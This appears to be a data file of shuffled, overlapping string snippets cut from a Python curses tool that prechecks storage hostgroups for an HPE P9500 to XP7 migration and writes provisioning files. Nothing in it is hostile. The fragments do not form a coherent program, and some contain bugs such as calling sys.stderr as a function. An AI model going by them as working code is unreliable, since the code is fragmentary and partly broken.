"HOSTGROUP\",consistent.clear)) write_prov = ShowWriteProvisionMenu(menu_win,consistent,map_dir,stdscr) main_menu_items.append((\"Write PROVISION file\",write_prov.display)) main_menu = Menu(menu_win,main_menu_items,stdscr) main_menu.display() ### refresh",
"file ### for box_name,hostgroup_name in self.consistent.get(): if box_dict[box_name].test_hostgroup_exists(hostgroup_name): sf = os.path.join(self.map_dir,\"{}_{}.prov\".format(box_name,hostgroup_name)) with open(sf,\"wt\")",
"index == self.position: mode = curses.A_STANDOUT else: mode = curses.A_NORMAL line = \"{}\".format(item)",
"missing in config file {}, exiting..\".format(mandatory_section,configfile)) sys.exit(1) for name,value in cfg.items(\"boxpair\"): boxpair_dict[name.upper()] =",
"self.position < 0: self.position = 0 elif self.position >= len(self.items): self.position = len(self.items)",
"### for box_name in hostgroup_dict: for hostgroup_name in hostgroup_dict[box_name]: logger.debug(\"XPINFO processing: adding {}-{}",
"for migration AUTHOR : <NAME> / StorageTeam VERSION : Based on previous ODR",
"display(self): self.panel.top() self.panel.show() self.window.clear() line = \"{}: \".format(self.text) if line >= self.width: line",
"parse config ### #################### configfile = \"xpmig.ini\" cfg = ConfigParser() cfg.read(configfile) for mandatory_section",
"window self.heigth,self.width = self.window.getmaxyx() self.window.keypad(1) self.panel = panel.new_panel(self.window) self.panel.hide() panel.update_panels() self.position = 0",
"self.position = 0 elif self.position >= len(self.xpinfo_file_list): self.position = len(self.xpinfo_file_list) - 1 if",
"err_msg = \"No HORCM instance nbr defined for box {}, exiting..\".format(box_name) logger.error(err_msg) sys.stderr(err_msg",
"# self.selection.add(self.items[self.filtered_items[self.position]]) for add_item in self.items[self.filtered_items[self.position]]: self.selection.add(add_item) elif key == curses.KEY_UP: self.navigate(-1) elif",
"elif key in [curses.KEY_ENTER,ord(\"\\n\")]: if self.position == len(self.xpinfo_file_list) - 1: break else: logger.debug(\"XPINFO:",
"for row in xpinfo_file_reader: if len(row) > 8: hostname = row[0] device_name =",
"in enumerate(self.xpinfo_file_list): if index == self.position: mode = curses.A_STANDOUT else: mode = curses.A_NORMAL",
"{}, exiting..\".format(box_name) logger.error(err_msg) sys.stderr(err_msg + \"\\n\") sys.exit(1) if box_name in site_dict: site =",
"= \"{}: \".format(self.text) if line >= self.width: line = line[:self.width-1] self.window.addstr(1,2,line) curses.echo() self.window.refresh()",
"= window self.heigth,self.width = self.window.getmaxyx() self.title = title self.consistent = [] def display(self):",
"= window self.heigth,self.width = self.window.getmaxyx() self.xpinfo_file_list =[] self.slice_start = 0 self.slice_len = 0",
"del self.consistent[:] self.display() def get(self): return self.consistent class ShowSummaryMenu(object): def __init__(self,window,selection,stdscr): self.window =",
"\"{} : {}\".format(self.title, \",\".join([\"{}-{}\".format(x[0],x[1]) for x in self.selection])) if len(line) >= self.width: line",
"in serialnbr_dict: serial_nbr = serialnbr_dict[box_name] else: err_msg = \"No serial nbr defined for",
"\"{}\".format(item[0]) if len(line) >= self.width: line = line[:self.width-1] self.window.addstr(1+index,2,line,mode) key = self.window.getch() if",
"= \"\" self.display() def get(self): return self.search_str class Consistent(object): def __init__(self,window,title,stdscr): self.window =",
"self.window.clear() line = \"{}: {}\".format(self.title,\",\".join([\"{}-{}\".format(x[0],x[1]) for x in self.consistent])) if len(line) >= self.width:",
"in enumerate(self.filtered_items): if index == self.position: mode = curses.A_STANDOUT else: mode = curses.A_NORMAL",
"curses.COLS < 20 or curses.LINES < 20: sys.stderr.write(\"Window not large enough, exiting ..\\n\")",
"for box_name in boxpair_dict[boxpair_name]: hostgroup_name_list = box_dict[box_name].get_hostgroups() for hostgroup_name in hostgroup_name_list: if hostgroup_name",
"box_name in instance_dict: instance_nbr = instance_dict[box_name] else: err_msg = \"No HORCM instance nbr",
"consistency check results\",hostgroup_consistency.display)) main_menu_items.append((\"Clear HOSTGROUP selection\",selection.clear)) main_menu_items.append((\"Clear consistent HOSTGROUP\",consistent.clear)) write_prov = ShowWriteProvisionMenu(menu_win,consistent,map_dir,stdscr) main_menu_items.append((\"Write",
"for box {} :\".format(box_name)) logger.info(box_dict[box_name]) ##################### ### start menu ### ##################### curses.wrapper(main) logger.info(\"#\"",
"curses.KEY_DOWN: self.navigate(1) elif key == curses.KEY_PPAGE: self.navigate(-10) elif key == curses.KEY_NPAGE: self.navigate(10) self.window.clear()",
"hostgroups by box ### for boxpair_name in sorted(boxpair_dict.keys()): select_item_dict = {} for box_name",
"if len(line) >= self.width: line = line[:self.width-1] self.window.addstr(1,2,line) self.window.border() self.window.refresh() curses.doupdate() def add(self,item):",
"FUNCTIONS #################################################################################################### #################################################################################################### ### CLASSES #################################################################################################### class Menu(object): def __init__(self,window,items,stdscr): self.window = window",
"ShowWriteProvisionMenu(menu_win,consistent,map_dir,stdscr) main_menu_items.append((\"Write PROVISION file\",write_prov.display)) main_menu = Menu(menu_win,main_menu_items,stdscr) main_menu.display() ### refresh & wait ###",
"= self.window.getmaxyx() self.window.keypad(1) self.panel = panel.new_panel(self.window) self.panel.hide() panel.update_panels() self.position = 0 self.items =",
"class Search(object): def __init__(self,window,title,stdscr): self.window = window self.heigth,self.width = self.window.getmaxyx() self.title = title",
"log_level = 30 try: log_size = cfg.getint(\"log\",\"maxsize\") except: log_size = 100000000 try: log_versions",
"logger.info(\"#\" * linelen) logger.info(\"Configuration settings :\") logger.info(\"BOXPAIR :\") logger.info(boxpair_dict) logger.info(\"SERIAL NBRs:\") logger.info(serialnbr_dict) logger.info(\"INSTANCE",
">= 1: ### slide slice up ### self.slice_start += n if self.slice_start <",
"= self.slice_start + self.slice_len logger.debug(\"Select_Menu.navigate :: slide slice up to {}-{}\".format(self.slice_start,self.slice_end )) elif",
"{}-{} to the selection\".format(box_name,hostgroup_name)) self.selection.add((box_name,hostgroup_name)) elif key == curses.KEY_UP: self.navigate(-1) elif key ==",
"key = self.window.getch() if key in [curses.KEY_ENTER,ord(\"\\n\"),ord(\"B\"),ord(\"b\")]: if self.position == len(self.items) - 1:",
"self.navigate(-10) elif key == curses.KEY_NPAGE: self.navigate(10) self.window.clear() self.panel.hide() panel.update_panels() curses.doupdate() class ShowConsistencyMenu(object): def",
"<= index <= self.slice_end: # logger.debug(\"SelectMenu.display :: index in slice {} - {},",
"self.panel.top() self.panel.show() self.window.clear() self.window.addstr(1,2,\"Write provisioning out to file for the consistent HOSTGROUPs ?",
"0: if self.slice_end < len(self.display_list) - 1: self.slice_end += n if self.slice_end >",
"0: self.position = 0 elif self.position >= len(self.items): self.position = len(self.items) - 1",
"- self.slice_start < 2 and self.slice_start >= 1: ### slide slice up ###",
"os.path.join(collect_dir,collectfile_dict[box_name]) if box_name in instance_dict: instance_nbr = instance_dict[box_name] else: err_msg = \"No HORCM",
"self.slice_len = min(len(self.filtered_items)-1,self.heigth-6) self.slice_end = self.slice_start + self.slice_len self.window.keypad(1) self.panel = panel.new_panel(self.window) self.panel.hide()",
"import csv import string import xp7 #################################################################################################### ### VARIABLES #################################################################################################### linelen = 100",
"SCROLL UP <ARROW-DOWN or PAGE-DOWN> SCROLL DOWN <B> BACK\",curses.A_BOLD) ### define menu_win ###",
"in boxpair_dict[boxpair_name]: hostgroup_name_list = box_dict[box_name].get_hostgroups() for hostgroup_name in hostgroup_name_list: hba_wwn_list = box_dict[box_name].get_hostgroup_hba_wwns(hostgroup_name) for",
"self.width: line = line[:self.width-1] self.window.addstr(1+index,2,line,mode) key = self.window.getch() if key in [curses.KEY_ENTER,ord(\"\\n\"),ord(\"B\"),ord(\"b\")]: if",
"n = {}\".format(self.position,n )) ### adjust slice ### if n < 0: if",
"= len(self.filtered_items) - 1 logger.debug(\"Select_Menu.navigate :: position = {}, n = {}\".format(self.position,n ))",
"self.title = title self.consistent = [] def display(self): self.window.clear() line = \"{}: {}\".format(self.title,\",\".join([\"{}-{}\".format(x[0],x[1])",
"- 1: break else: # self.items = {\"select_str\":[(boxpair_name,hostgroup_name),...]} # self.selection.add(self.items[self.filtered_items[self.position]]) for add_item in",
"del self.selection[:] self.display() def get(self): return self.selection class Search(object): def __init__(self,window,title,stdscr): self.window =",
"NBRs:\") logger.info(instance_dict) logger.info(\"SITE NBRs:\") logger.info(site_dict) logger.info(\"COLLECT FILEs:\") logger.info(collectfile_dict) logger.info(\"XPINFO dir: {}\".format(xpinfo_dir)) ######################### ###",
"len(self.filtered_items) - 1: break else: # self.items = {\"select_str\":[(boxpair_name,hostgroup_name),...]} # self.selection.add(self.items[self.filtered_items[self.position]]) for add_item",
"return self.selection class Search(object): def __init__(self,window,title,stdscr): self.window = window self.heigth,self.width = self.window.getmaxyx() self.title",
"def __init__(self,window,selection,stdscr): self.window = window self.heigth,self.width = self.window.getmaxyx() self.selection = selection self.hostgroup_summary =",
"if hostgroup_name not in select_item_dict: select_item_dict[hostgroup_name] = set() select_item_dict[hostgroup_name].add((box_name,hostgroup_name)) hg_by_name_menu = Select_Menu(menu_win,select_item_dict,selection,search,stdscr) main_menu_items.append((\"Select",
"+ self.slice_len elif n > 0: if self.slice_end < len(self.display_list) - 1: self.slice_end",
"True: self.window.refresh() curses.doupdate() for index,item in enumerate(self.items): if index == self.position: mode =",
"= \"{} : {}\".format(self.title, \",\".join([\"{}-{}\".format(x[0],x[1]) for x in self.selection])) if len(line) >= self.width:",
"self.display() def clear(self): self.search_str = \"\" self.display() def get(self): return self.search_str class Consistent(object):",
"logger.info(\"BOXPAIR :\") logger.info(boxpair_dict) logger.info(\"SERIAL NBRs:\") logger.info(serialnbr_dict) logger.info(\"INSTANCE NBRs:\") logger.info(instance_dict) logger.info(\"SITE NBRs:\") logger.info(site_dict) logger.info(\"COLLECT",
"\"\"\" if self.search.get() != \"\": logger.debug(\"Select_Menu.update :: update items to match search str",
"= \"{}: {}\".format(index,item) line = \"{}\".format(item) if len(line) >= self.width: line = line[:self.width-1]",
"main_menu_items.append((\"Select by HOSTNAME\",hg_by_host_menu.display)) ### select hostgroups by name ### select_item_dict = {} for",
"1 logger.debug(\"Select_Menu.navigate :: position = {}, n = {}\".format(self.position,n )) ### adjust slice",
"len(hba_wwn.nickname.split(\"_\")) > 1: sel_item = hba_wwn.nickname.split(\"_\")[0] else: sel_item = hba_wwn.nickname if \"{}-{}\".format(box_name,sel_item) not",
"self.slice_end += n if self.slice_end > len(self.xpinfo_file_list) - 1: self.slice_end = len(self.xpinfo_file_list) -",
"cfg.get(\"dir\",\"log\") except: sys.stderr.write(\"log file dir not defined, exiting..\\n\") sys.exit(1) try: xpinfo_dir = cfg.get(\"dir\",\"xpinfo\")",
"self.reply = self.window.getstr() ### after we received the response ### self.update_object.set(self.reply) self.window.clear() self.panel.hide()",
"self.window = window self.heigth,self.width = self.window.getmaxyx() self.title = title self.search_str = \"\" def",
"self.navigate(-10) elif key == curses.KEY_NPAGE: self.navigate(10) self.window.clear() self.panel.hide() panel.update_panels() curses.doupdate() class ShowWriteProvisionMenu(object): def",
"self.display() def get(self): return self.search_str class Consistent(object): def __init__(self,window,title,stdscr): self.window = window self.heigth,self.width",
"### self.display_list = [] for box_name,hostgroup_name in self.selection.get(): self.display_list.extend(box_dict[box_name].get_hostgroup_noluns(hostgroup_name)) ### now we know",
"selection = Selection(select_win,\"SELECTED HOSTGROUP(s)\",stdscr) selection.display() ### define consistent_win ### consistent_win = stdscr.subwin(3,curses.COLS,curses.LINES-4,0) consistent",
"sys.stderr.write(\"collect file dir not defined, exiting..\\n\") sys.exit(1) try: map_dir = cfg.get(\"dir\",\"map\") except: sys.stderr.write(\"map",
"### read XPINFO file ### xpinfo_menu = Select_XPinfo(menu_win,selection,xpinfo_dir,stdscr) main_menu_items.append((\"Read XPINFO file\",xpinfo_menu.display)) ### show",
"+ self.slice_len self.window.keypad(1) self.panel = panel.new_panel(self.window) self.panel.hide() panel.update_panels() self.position = 0 self.selection =",
"box_name,hostgroup_name in self.consistent.get(): if box_dict[box_name].test_hostgroup_exists(hostgroup_name): sf = os.path.join(self.map_dir,\"{}_{}.prov\".format(box_name,hostgroup_name)) with open(sf,\"wt\") as sfh: box_dict[box_name].print_provisioning(hostgroup_name,sfh)",
"!= \"\": logger.debug(\"Select_Menu.update :: update items to match search str {}\".format(self.search.get())) self.filtered_items =",
"= Search(search_win,\"Display HOSTGROUPS matching this SEARCH expression\",stdscr) search.display() ### define selection_win ### select_win",
"file 2.0 Consistency check update 2.1 Add xpinfo file processing CONFIG : xpmig.ini",
"= hba_wwn.nickname if \"{}-{}\".format(box_name,sel_item) not in select_item_dict: select_item_dict[\"{}-{}\".format(box_name,sel_item)] = set() select_item_dict[\"{}-{}\".format(box_name,sel_item)].add((box_name,hostgroup_name)) hg_by_host_menu =",
"{}\".format(xpinfo_dir)) ######################### ### instantiate boxes ### ######################### for box_name in collectfile_dict: collect_file =",
"in [curses.KEY_ENTER,ord(\"\\n\")]: if self.position == len(self.filtered_items) - 1: break else: # self.items =",
"self.display() def clear(self): del self.consistent[:] self.display() def get(self): return self.consistent class ShowSummaryMenu(object): def",
"main_menu_items.append((\"Write PROVISION file\",write_prov.display)) main_menu = Menu(menu_win,main_menu_items,stdscr) main_menu.display() ### refresh & wait ### stdscr.refresh()",
"site = site_dict[box_name] else: err_msg = \"No site defined for box {}, exiting..\".format(box_name)",
"to match search all\") self.filtered_items = copy.copy(self.items.keys()) self.filtered_items.append(\"exit\") self.slice_start = 0 self.slice_end =",
"= \"No serial nbr defined for box {}, exiting..\".format(box_name) logger.error(err_msg) sys.stderr(err_msg + \"\\n\")",
"self.slice_len def display(self): self.panel.top() self.panel.show() self.window.clear() self.update() while True: self.window.clear() self.window.refresh() curses.doupdate() ###",
"to be valid, skipping {}\".format(row)) ### translate ldev to hostgroup ### for serial_nbr",
"[f for f in os.listdir(self.xpinfo_dir) if os.path.isfile(\"{}/{}\".format(self.xpinfo_dir,f)) and re.match(\".+\\.xpinfo$\",f,flags=re.IGNORECASE)] self.xpinfo_file_list.append(\"exit\") self.slice_len = min(len(self.xpinfo_file_list)-1,",
"VERSION : Based on previous ODR framework 1.0 Initial version 1.1 Curses menu",
"\"{}: {}\".format(self.title,\",\".join([\"{}-{}\".format(x[0],x[1]) for x in self.consistent])) if len(line) >= self.width: line = line[:self.width-1]",
"self.position < 0: self.position = 0 elif self.position >= len(self.xpinfo_file_list): self.position = len(self.xpinfo_file_list)",
"line = \"{}\".format(item[0]) if len(line) >= self.width: line = line[:self.width-1] self.window.addstr(1+index,2,line,mode) key =",
"not added to consistent hostgroup list during consistency check\".format(box_name,hostgroup_name)) else: logger.debug(\"{}-{} does not",
"# self.items = {\"select_str\":[(boxpair_name,hostgroup_name),...]} # self.selection.add(self.items[self.filtered_items[self.position]]) for add_item in self.items[self.filtered_items[self.position]]: self.selection.add(add_item) elif key",
">= self.width: line = line[:self.width-1] self.window.addstr(1,2,line) self.window.border() self.window.refresh() curses.doupdate() def set(self,search_str): self.search_str =",
"#################################################################################################### def main(stdscr): ### clear screen ### stdscr.clear() ### check window heigth and",
"import panel import re import logging import logging.handlers import copy from ConfigParser import",
"display(self): self.panel.top() self.panel.show() self.window.clear() self.update() while True: self.window.clear() self.window.refresh() curses.doupdate() ### show the",
"### if n < 0: if self.position - self.slice_start < 2 and self.slice_start",
"key == curses.KEY_DOWN: self.navigate(1) self.window.clear() self.panel.hide() panel.update_panels() curses.doupdate() class InputMenu(object): def __init__(self,window,text,upd_obj,stdscr): self.window",
"map_dir = cfg.get(\"dir\",\"map\") except: sys.stderr.write(\"map file dir not defined, exiting..\\n\") sys.exit(1) serial_to_name_dict =",
"self.items[self.position][1]() elif key == curses.KEY_UP: self.navigate(-1) elif key == curses.KEY_DOWN: self.navigate(1) self.window.clear() self.panel.hide()",
"[] for box_name,hostgroup_name in self.selection.get(): if box_dict[box_name].test_hostgroup_exists(hostgroup_name): ### TODO: add CA check ###",
"n if self.slice_end > len(self.filtered_items) - 1: self.slice_end = len(self.filtered_items) - 1 self.slice_start",
"add_item in self.items[self.filtered_items[self.position]]: self.selection.add(add_item) elif key == curses.KEY_UP: self.navigate(-1) elif key == curses.KEY_DOWN:",
"self.slice_start <= index <= self.slice_end: # logger.debug(\"SelectMenu.display :: index in slice {} -",
"= 0 self.slice_len = min(len(self.display_list),self.heigth-6) self.slice_end = self.slice_start + self.slice_len while True: self.window.clear()",
"break else: self.items[self.position][1]() elif key == curses.KEY_UP: self.navigate(-1) elif key == curses.KEY_DOWN: self.navigate(1)",
"re.match(\".+\\.xpinfo$\",f,flags=re.IGNORECASE)] self.xpinfo_file_list.append(\"exit\") self.slice_len = min(len(self.xpinfo_file_list)-1, self.heigth - 6) self.slice_start = 0 self.slice_end =",
"1: break else: logger.debug(\"XPINFO: start processing {}\".format(self.xpinfo_file_list[self.position])) serial_nbr_set = set(serialnbr_dict.values()) ldev_dict = {}",
"= panel.new_panel(self.window) self.panel.hide() panel.update_panels() self.text = text self.reply = \"\" self.update_object = upd_obj",
"self.window.getch() if key in [curses.KEY_ENTER,ord(\"\\n\"),ord(\"Y\"),ord(\"y\")]: ### write out the ldevs to file ###",
"- self.position < 2 and self.slice_end < len(self.filtered_items) - 1: ### slide slice",
"exiting..\".format(box_name) logger.error(err_msg) sys.stderr(err_msg + \"\\n\") sys.exit(1) box_dict[box_name] = xp7.XP7(box_name,instance_nbr,serial_nbr,site,collect_file) logger.info(\"XP7 object created for",
"serialnbr_dict: serial_nbr = serialnbr_dict[box_name] else: err_msg = \"No serial nbr defined for box",
"self.position - self.slice_start < 2 and self.slice_start >= 1: ### slide slice up",
"if not cfg.has_section(mandatory_section): sys.stderr(\"{} section missing in config file {}, exiting..\".format(mandatory_section,configfile)) sys.exit(1) for",
"= 0 self.slice_end = self.slice_start + self.slice_len self.position = 0 def navigate(self,n): self.position",
"logger.info(box_dict[box_name]) ##################### ### start menu ### ##################### curses.wrapper(main) logger.info(\"#\" * linelen) logger.info(\"XPMIG PRECHECK",
"to addstr line {}\".format(line)) if self.slice_start <= index <= self.slice_end: # logger.debug(\"SelectMenu.display ::",
"main_menu_items = [] input_search = InputMenu(menu_win,\"Specify new search string\",search,stdscr) main_menu_items.append((\"Set SEARCH string\",input_search.display)) main_menu_items.append((\"Clear",
"examine hostgroup is ready for migration AUTHOR : <NAME> / StorageTeam VERSION :",
"hostgroup_dict[box_name] = set() for ldev_nbr in ldev_dict[serial_nbr]: for hostgroup_name in box_dict[box_name].get_ldev_hostgroups(ldev_nbr): hostgroup_dict[box_name].add(hostgroup_name) ###",
"< 2 and self.slice_end < len(self.xpinfo_file_list) - 1: ### slide slice down ###",
"self.selection class Search(object): def __init__(self,window,title,stdscr): self.window = window self.heigth,self.width = self.window.getmaxyx() self.title =",
"+= n if self.position < 0: self.position = 0 elif self.position >= len(self.xpinfo_file_list):",
"[curses.KEY_ENTER,ord(\"\\n\")]: if self.position == len(self.xpinfo_file_list) - 1: break else: logger.debug(\"XPINFO: start processing {}\".format(self.xpinfo_file_list[self.position]))",
"except: log_level = 30 try: log_size = cfg.getint(\"log\",\"maxsize\") except: log_size = 100000000 try:",
"boxpair_dict[name.upper()] = value.split(\",\") for name,value in cfg.items(\"serialnbr\"): serialnbr_dict[name.upper()] = int(value) for name,value in",
"\".format(self.text) if line >= self.width: line = line[:self.width-1] self.window.addstr(1,2,line) curses.echo() self.window.refresh() curses.doupdate() self.reply",
"defined, exiting..\\n\") sys.exit(1) try: map_dir = cfg.get(\"dir\",\"map\") except: sys.stderr.write(\"map file dir not defined,",
"import os.path import csv import string import xp7 #################################################################################################### ### VARIABLES #################################################################################################### linelen",
"list to display ### self.display_list = [] for box_name,hostgroup_name in self.selection.get(): self.display_list.extend(box_dict[box_name].get_hostgroup_noluns(hostgroup_name)) ###",
"= panel.new_panel(self.window) self.panel.hide() panel.update_panels() def display(self): self.panel.top() self.panel.show() self.window.clear() self.window.addstr(1,2,\"Write provisioning out to",
"select_item_dict = {} for box_name in boxpair_dict[boxpair_name]: hostgroup_name_list = box_dict[box_name].get_hostgroups() for hostgroup_name in",
"self.selection.add(add_item) elif key == curses.KEY_UP: self.navigate(-1) elif key == curses.KEY_DOWN: self.navigate(1) elif key",
"\"{}\".format(item) if len(line) >= self.width: line = line[:self.width-1] ### only add lines in",
"__init__(self,window,title,stdscr): self.window = window self.heigth,self.width = self.window.getmaxyx() self.title = title self.search_str = \"\"",
"line = line[:self.width-1] ### only add lines in the slice ### if self.slice_start",
"if box_name in instance_dict: instance_nbr = instance_dict[box_name] else: err_msg = \"No HORCM instance",
"HOSTGROUP(s)\",stdscr) selection.display() ### define consistent_win ### consistent_win = stdscr.subwin(3,curses.COLS,curses.LINES-4,0) consistent = Consistent(consistent_win,\"CONSISTENT HOSTGROUP(s)\",stdscr)",
"lines in the slice ### if self.slice_start <= index <= self.slice_end: self.window.addstr(1+(index-self.slice_start),2,line,mode) key",
"self.panel.hide() panel.update_panels() curses.doupdate() class ShowWriteProvisionMenu(object): def __init__(self,window,consistent,map_dir,stdscr): self.window = window self.consistent = consistent",
"search = Search(search_win,\"Display HOSTGROUPS matching this SEARCH expression\",stdscr) search.display() ### define selection_win ###",
"curses.A_STANDOUT else: mode = curses.A_NORMAL # line = \"{}: {}\".format(index,item) line = \"{}\".format(item)",
"files ### for index,item in enumerate(self.xpinfo_file_list): if index == self.position: mode = curses.A_STANDOUT",
"xpinfo_dir = cfg.get(\"dir\",\"xpinfo\") except: sys.stderr.write(\"xpinfo file dir not defined, exiting..\\n\") sys.exit(1) try: collect_dir",
"hostgroup_name in hostgroup_name_list: if hostgroup_name not in select_item_dict: select_item_dict[hostgroup_name] = set() select_item_dict[hostgroup_name].add((box_name,hostgroup_name)) hg_by_box_menu",
"current_set = set(self.consistent) current_set.add(item) self.consistent = list(sorted(current_set)) self.display() def clear(self): del self.consistent[:] self.display()",
"curses.A_STANDOUT else: mode = curses.A_NORMAL line = \"{}\".format(item) if len(line) >= self.width: line",
"for hba_wwn in hba_wwn_list: if len(hba_wwn.nickname.split(\"_\")) > 1: sel_item = hba_wwn.nickname.split(\"_\")[0] else: sel_item",
"set() ### process the selected xpinfo file ### with open(\"{}/{}\".format(self.xpinfo_dir,self.xpinfo_file_list[self.position]),\"rt\") as f: xpinfo_file_reader",
"self.window.getmaxyx() self.title = title self.selection = [] def display(self): self.window.clear() line = \"{}",
"%(levelname)s %(message)s\",\"%Y/%m/%d-%H:%M:%S\") fh.setFormatter(formatter) logger.addHandler(fh) logger.info(\"#\" * linelen) logger.info(\"XPMIG PRECHECK started\") logger.info(\"#\" * linelen)",
"### TODO: add CA check ### result,report = box_dict[box_name].get_hostgroup_consistency(hostgroup_name) self.display_list.extend(report) if result: self.consistent.add((box_name,hostgroup_name))",
"title_win.addstr(1,2,\"HPE P9500 TO XP7 MIGRATION PRE-CHECK\") title_win.border() ### define search_win ### search_win =",
"curses.KEY_NPAGE: self.navigate(10) self.window.clear() self.panel.hide() panel.update_panels() curses.doupdate() class ShowWriteProvisionMenu(object): def __init__(self,window,consistent,map_dir,stdscr): self.window = window",
"self.position: mode = curses.A_STANDOUT else: mode = curses.A_NORMAL # line = \"{}: {}\".format(index,item)",
"== curses.KEY_UP: self.navigate(-1) elif key == curses.KEY_DOWN: self.navigate(1) self.window.clear() self.panel.hide() panel.update_panels() curses.doupdate() class",
"self.slice_len elif n > 0: if self.slice_end - self.position < 2 and self.slice_end",
"> len(self.display_list) - 1: self.slice_end = len(self.display_list) - 1 self.slice_start = self.slice_end -",
"2.0 Consistency check update 2.1 Add xpinfo file processing CONFIG : xpmig.ini LOG",
"self.position = len(self.xpinfo_file_list) - 1 if n < 0: if self.position - self.slice_start",
"- 1: self.slice_end = len(self.filtered_items) - 1 self.slice_start = self.slice_end - self.slice_len logger.debug(\"Select_Menu.navigate",
"index in slice {} - {}, executing addstr\".format(self.slice_start,self.slice_end)) self.window.addstr(1+(index-self.slice_start),2,line,mode) key = self.window.getch() if",
"<ARROW-DOWN or PAGE-DOWN> SCROLL DOWN <B> BACK\",curses.A_BOLD) ### define menu_win ### menu_win =",
":: slide slice down to {}-{}\".format(self.slice_start,self.slice_end )) def display(self): self.panel.top() self.panel.show() self.window.clear() self.update()",
"Select_XPinfo(menu_win,selection,xpinfo_dir,stdscr) main_menu_items.append((\"Read XPINFO file\",xpinfo_menu.display)) ### show hostgroup summary menu ### hostgroup_summary = ShowSummaryMenu(menu_win,selection,stdscr)",
"self.slice_start < 2 and self.slice_start >= 1: ### slide slice up ### self.slice_start",
"in sorted(boxpair_dict.keys()): select_item_dict = {} for box_name in boxpair_dict[boxpair_name]: hostgroup_name_list = box_dict[box_name].get_hostgroups() for",
"if self.slice_start <= index <= self.slice_end: # logger.debug(\"SelectMenu.display :: index in slice {}",
"= items self.items.append((\"exit\",\"exit\")) def navigate(self,n): self.position += n if self.position < 0: self.position",
"class Menu(object): def __init__(self,window,items,stdscr): self.window = window self.heigth,self.width = self.window.getmaxyx() self.window.keypad(1) self.panel =",
"ldev_dict[serial_nbr]: for hostgroup_name in box_dict[box_name].get_ldev_hostgroups(ldev_nbr): hostgroup_dict[box_name].add(hostgroup_name) ### add found hostgroups to the selection",
"in [ord(\"b\"),ord(\"B\")]: break elif key in [curses.KEY_ENTER,ord(\"\\n\")]: if self.position == len(self.xpinfo_file_list) - 1:",
"os.path.join(log_dir,\"xpmig_precheck.log\") logger = logging.getLogger(\"xpmig_precheck\") logger.setLevel(log_level) fh = logging.handlers.RotatingFileHandler(logfile,maxBytes=log_size,backupCount=log_versions) formatter = logging.Formatter(\"%(asctime)s %(levelname)s %(message)s\",\"%Y/%m/%d-%H:%M:%S\")",
"[] def display(self): self.window.clear() line = \"{} : {}\".format(self.title, \",\".join([\"{}-{}\".format(x[0],x[1]) for x in",
"read XPINFO file ### xpinfo_menu = Select_XPinfo(menu_win,selection,xpinfo_dir,stdscr) main_menu_items.append((\"Read XPINFO file\",xpinfo_menu.display)) ### show hostgroup",
"add(self,item): current_set = set(self.selection) current_set.add(item) self.selection = list(sorted(current_set)) self.display() def clear(self): del self.selection[:]",
"except: sys.stderr.write(\"collect file dir not defined, exiting..\\n\") sys.exit(1) try: map_dir = cfg.get(\"dir\",\"map\") except:",
"self.position == len(self.items) - 1: break else: self.items[self.position][1]() elif key == curses.KEY_UP: self.navigate(-1)",
"self.search_str = \"\" self.display() def get(self): return self.search_str class Consistent(object): def __init__(self,window,title,stdscr): self.window",
">= len(self.items): self.position = len(self.items) - 1 def display(self): self.panel.top() self.panel.show() self.window.clear() while",
"get(self): return self.consistent class ShowSummaryMenu(object): def __init__(self,window,selection,stdscr): self.window = window self.heigth,self.width = self.window.getmaxyx()",
"match search str {}\".format(self.search.get())) self.filtered_items = [x for x in self.items.keys() if re.search(self.search.get(),x,flags=re.IGNORECASE)]",
"for box_name,hostgroup_name in self.consistent.get(): if box_dict[box_name].test_hostgroup_exists(hostgroup_name): sf = os.path.join(self.map_dir,\"{}_{}.prov\".format(box_name,hostgroup_name)) with open(sf,\"wt\") as sfh:",
"if self.slice_start < 0: self.slice_start = 0 self.slice_end = self.slice_start + self.slice_len elif",
"boxpair_name in sorted(boxpair_dict.keys()): select_item_dict = {} for box_name in boxpair_dict[boxpair_name]: hostgroup_name_list = box_dict[box_name].get_hostgroups()",
"self.navigate(10) self.window.clear() self.panel.hide() panel.update_panels() curses.doupdate() class ShowWriteProvisionMenu(object): def __init__(self,window,consistent,map_dir,stdscr): self.window = window self.consistent",
"try: log_dir = cfg.get(\"dir\",\"log\") except: sys.stderr.write(\"log file dir not defined, exiting..\\n\") sys.exit(1) try:",
"now we know what to display ### self.slice_start = 0 self.slice_len = min(len(self.display_list),self.heigth-6)",
"[] def display(self): self.window.clear() line = \"{}: {}\".format(self.title,\",\".join([\"{}-{}\".format(x[0],x[1]) for x in self.consistent])) if",
"curses.KEY_NPAGE: self.navigate(10) self.window.clear() self.panel.hide() panel.update_panels() curses.doupdate() #################################################################################################### ### MAIN #################################################################################################### def main(stdscr): ###",
"out the ldevs to file ### for box_name,hostgroup_name in self.consistent.get(): if box_dict[box_name].test_hostgroup_exists(hostgroup_name): sf",
")) elif n > 0: if self.slice_end - self.position < 2 and self.slice_end",
"display(self): self.window.clear() line = \"{}: {}\".format(self.title,\",\".join([\"{}-{}\".format(x[0],x[1]) for x in self.consistent])) if len(line) >=",
"self.panel.show() self.window.clear() while True: self.window.refresh() curses.doupdate() for index,item in enumerate(self.items): if index ==",
"in select_item_dict: select_item_dict[\"{}-{}\".format(box_name,sel_item)] = set() select_item_dict[\"{}-{}\".format(box_name,sel_item)].add((box_name,hostgroup_name)) hg_by_host_menu = Select_Menu(menu_win,select_item_dict,selection,search,stdscr) main_menu_items.append((\"Select by HOSTNAME\",hg_by_host_menu.display)) ###",
"### parse config ### #################### configfile = \"xpmig.ini\" cfg = ConfigParser() cfg.read(configfile) for",
"key_win = stdscr.subwin(1,curses.COLS,curses.LINES-1,0) #key_win.clear() #key_win.refresh() #curses.doupdate() key_win.addstr(0,2,\"<ARROW-UP or PAGE-UP> SCROLL UP <ARROW-DOWN or",
"main_menu_items.append((\"Select by HOSTGROUP\",hg_by_name_menu.display)) ### read XPINFO file ### xpinfo_menu = Select_XPinfo(menu_win,selection,xpinfo_dir,stdscr) main_menu_items.append((\"Read XPINFO",
"self.window = window self.heigth,self.width = self.window.getmaxyx() self.window.keypad(1) self.panel = panel.new_panel(self.window) self.panel.hide() panel.update_panels() self.position",
"added 1.2 Add search term criteria 1.3 Add config file 2.0 Consistency check",
"logger.error(err_msg) sys.stderr(err_msg + \"\\n\") sys.exit(1) if box_name in serialnbr_dict: serial_nbr = serialnbr_dict[box_name] else:",
"in self.selection.get(): if box_dict[box_name].test_hostgroup_exists(hostgroup_name): ### TODO: add CA check ### result,report = box_dict[box_name].get_hostgroup_consistency(hostgroup_name)",
